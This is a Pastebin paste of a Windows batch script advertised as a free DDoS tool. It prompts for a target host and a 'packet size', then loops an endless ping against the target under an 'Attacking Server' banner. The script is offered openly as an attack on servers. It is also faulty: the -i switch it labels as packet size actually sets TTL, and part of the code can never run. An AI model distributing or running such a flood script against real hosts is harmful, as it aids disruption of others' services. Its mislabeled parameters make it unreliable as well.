RintoMuhamad

DDOS Script Free Use :D

Apr 18th, 2016
422
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.88 KB | None | 0 0
  1. @echo off
  2. mode 67,16
  3. title DDOS Attacking Server
  4. color 0c
  5. cls
  6. echo ==================================
  7. echo = Rinto AR =
  8. echo ==================================
  9. echo.
  10. echo +++++++++++++++++++++++++++++++++++++++++++++++
  11. echo + Name : DDOS Attacking Server +
  12. echo + Author : Rinto AR +
  13. echo + Visite : https://www.facebook.com/rinto2234 +
  14. echo +++++++++++++++++++++++++++++++++++++++++++++++
  15. echo.
  16. goto Next
  17. echo.
  18. echo DDOS With Batchfile
  19. echo.
  20. set /p x=Server-Target:
  21. echo.
  22. ping %x%
  23. @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
  24. goto Next
  25. :Next
  26. echo.
  27. echo ***********************************
  28. echo * Masukan IP / Atau URL WEB *
  29. echo ***********************************
  30. echo.
  31. set /p m=ip Host:
  32. echo.
  33. set /p n=Packet Size:
  34. echo.
  35. :DDOS
  36. color 0b
  37. echo Attacking Server %m%
  38. ping %m% -i %n% -t >nul
  39. goto DDOS
Add Comment
Please, Sign In to add comment